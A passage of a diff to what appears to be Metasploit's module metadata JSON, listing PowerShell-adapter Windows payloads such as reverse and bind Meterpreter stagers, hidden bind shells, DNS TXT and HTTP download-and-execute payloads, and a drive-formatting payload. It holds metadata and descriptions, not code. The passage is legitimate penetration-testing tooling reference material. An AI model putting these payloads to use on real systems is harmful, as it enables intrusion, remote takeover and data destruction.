"rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_tcp_rc4" + }, + "payload_cmd/windows/powershell/dllinject/reverse_tcp_rc4_dns": { + "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", + "fullname": "payload/cmd/windows/powershell/dllinject/reverse_tcp_rc4_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": 
"/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_rc4_dns", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/reverse_tcp_rc4_dns", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_tcp_rc4_dns" + }, + "payload_cmd/windows/powershell/dllinject/reverse_tcp_uuid": { + "name": "Powershell Exec, Reverse TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/powershell/dllinject/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_tcp_uuid" + }, + "payload_cmd/windows/powershell/dllinject/reverse_winhttp": { + "name": "Powershell Exec, Windows Reverse HTTP Stager 
(winhttp)", + "fullname": "payload/cmd/windows/powershell/dllinject/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/reverse_winhttp", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_winhttp" + }, + "payload_cmd/windows/powershell/dns_txt_query_exec": { + "name": "Powershell Exec, DNS TXT Record Payload Download and Execution", + "fullname": "payload/cmd/windows/powershell/dns_txt_query_exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "corelanc0d3r " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nPerforms a TXT query against a series of DNS record(s) and executes the returned x86 shellcode. The DNSZONE\noption is used as the base name to iterate over. The payload will first request the TXT contents of the a\nhostname, followed by b, then c, etc. until there are no more records. 
For each record that is returned, exactly\n255 bytes from it are copied into a buffer that is eventually executed. This buffer should be encoded using\nx86/alpha_mixed with the BufferRegister option set to EDI.", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dns_txt_query_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dns_txt_query_exec", + "staged": false + }, + "payload_cmd/windows/powershell/download_exec": { + "name": "Powershell Exec, Windows Executable Download (http,https,ftp) and Execute", + "fullname": "payload/cmd/windows/powershell/download_exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "corelanc0d3r " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nDownload an EXE from an HTTP(S)/FTP URL and execute it", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/download_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/download_exec", + "staged": false + }, + "payload_cmd/windows/powershell/exec": { + "name": 
"Powershell Exec", + "fullname": "payload/cmd/windows/powershell/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/exec", + "staged": false + }, + "payload_cmd/windows/powershell/format_all_drives": { + "name": "Powershell Exec", + "fullname": "payload/cmd/windows/powershell/format_all_drives", + "aliases": [], + "rank": 0, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "Ashfaq Ansari ", + "Ruei-Min Jiang " + ], + "description": "Execute an x86 payload from a command via PowerShell", + "references": [ + "URL-http://hacksys.vfreaks.com/research/shellcode-of-death.html", + "URL-https://github.com/hacksysteam/ShellcodeOfDeath" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/format_all_drives", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "ShellcodeOfDeath" + ] + }, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", 
+ "adapted_refname": "windows/format_all_drives", + "staged": false + }, + "payload_cmd/windows/powershell/generic/debug_trap": { + "name": "Powershell Exec, Generic x86 Debug Trap", + "fullname": "payload/cmd/windows/powershell/generic/debug_trap", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "robert " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nGenerate a debug trap in the target process", + "references": [], + "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/generic/debug_trap", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "generic/debug_trap", + "staged": false + }, + "payload_cmd/windows/powershell/generic/tight_loop": { + "name": "Powershell Exec, Generic x86 Tight Loop", + "fullname": "payload/cmd/windows/powershell/generic/tight_loop", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "jduck " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nGenerate a tight loop in the target process", + "references": [], + "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/generic/tight_loop", + "check": false, + "post_auth": 
false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "generic/tight_loop", + "staged": false + }, + "payload_cmd/windows/powershell/loadlibrary": { + "name": "Powershell Exec", + "fullname": "payload/cmd/windows/powershell/loadlibrary", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/loadlibrary", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/loadlibrary", + "staged": false + }, + "payload_cmd/windows/powershell/messagebox": { + "name": "Powershell Exec, Windows MessageBox", + "fullname": "payload/cmd/windows/powershell/messagebox", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "corelanc0d3r ", + "jduck " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawns a dialog via MessageBox using a customizable title, text & icon", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": 
"cmd/windows/powershell/messagebox", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/messagebox", + "staged": false + }, + "payload_cmd/windows/powershell/meterpreter/bind_hidden_ipknock_tcp": { + "name": "Powershell Exec, Hidden Bind Ipknock TCP Stager", + "fullname": "payload/cmd/windows/powershell/meterpreter/bind_hidden_ipknock_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. 
The socket will appear as \"closed,\" thus helping to\nhide the shellcode", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection", + "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/bind_hidden_ipknock_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/bind_hidden_ipknock_tcp", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/bind_hidden_ipknock_tcp" + }, + "payload_cmd/windows/powershell/meterpreter/bind_hidden_tcp": { + "name": "Powershell Exec, Hidden Bind TCP Stager", + "fullname": "payload/cmd/windows/powershell/meterpreter/bind_hidden_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection", + "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 
+0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/bind_hidden_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/bind_hidden_tcp", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/bind_hidden_tcp" + }, + "payload_cmd/windows/powershell/meterpreter/bind_ipv6_tcp": { + "name": "Powershell Exec, Bind IPv6 TCP Stager (Windows x86)", + "fullname": "payload/cmd/windows/powershell/meterpreter/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/bind_ipv6_tcp" + }, + "payload_cmd/windows/powershell/meterpreter/bind_ipv6_tcp_uuid": { + "name": "Powershell Exec, Bind IPv6 
TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/cmd/windows/powershell/meterpreter/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/powershell/meterpreter/bind_named_pipe": { + "name": "Powershell Exec, Windows x86 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/powershell/meterpreter/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "UserExistsError" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + 
"rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/bind_named_pipe", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/bind_named_pipe" + }, + "payload_cmd/windows/powershell/meterpreter/bind_nonx_tcp": { + "name": "Powershell Exec, Bind TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/meterpreter/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "vlad902 " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (No NX)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/bind_nonx_tcp", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": 
"windows/bind_nonx_tcp" + }, + "payload_cmd/windows/powershell/meterpreter/bind_tcp": { + "name": "Powershell Exec, Bind TCP Stager (Windows x86)", + "fullname": "payload/cmd/windows/powershell/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/bind_tcp", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/bind_tcp" + }, + "payload_cmd/windows/powershell/meterpreter/bind_tcp_rc4": { + "name": "Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/meterpreter/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + 
"platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/bind_tcp_rc4" + }, + "payload_cmd/windows/powershell/meterpreter/bind_tcp_uuid": { + "name": "Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/cmd/windows/powershell/meterpreter/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/bind_tcp_uuid", + "staged": true, + 
"stage_refname": "windows/meterpreter", + "stager_refname": "windows/bind_tcp_uuid" + }, + "payload_cmd/windows/powershell/meterpreter/find_tag": { + "name": "Powershell Exec, Find Tag Ordinal Stager", + "fullname": "payload/cmd/windows/powershell/meterpreter/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUse an established connection", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/find_tag", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/findtag_ord" + }, + "payload_cmd/windows/powershell/meterpreter/reverse_http": { + "name": "Powershell Exec, Windows Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + 
"URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/reverse_http", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_http" + }, + "payload_cmd/windows/powershell/meterpreter/reverse_http_proxy_pstore": { + "name": "Powershell Exec, Reverse HTTP Stager Proxy", + "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_http_proxy_pstore", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/reverse_http_proxy_pstore", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": 
"windows/meterpreter/reverse_http_proxy_pstore", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_http_proxy_pstore" + }, + "payload_cmd/windows/powershell/meterpreter/reverse_https": { + "name": "Powershell Exec, Windows Reverse HTTPS Stager (wininet)", + "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTPS (Windows wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/reverse_https", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/reverse_https" + }, + "payload_cmd/windows/powershell/meterpreter/reverse_ipv6_tcp": { + "name": "Powershell Exec, Reverse TCP Stager (IPv6)", + "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker 
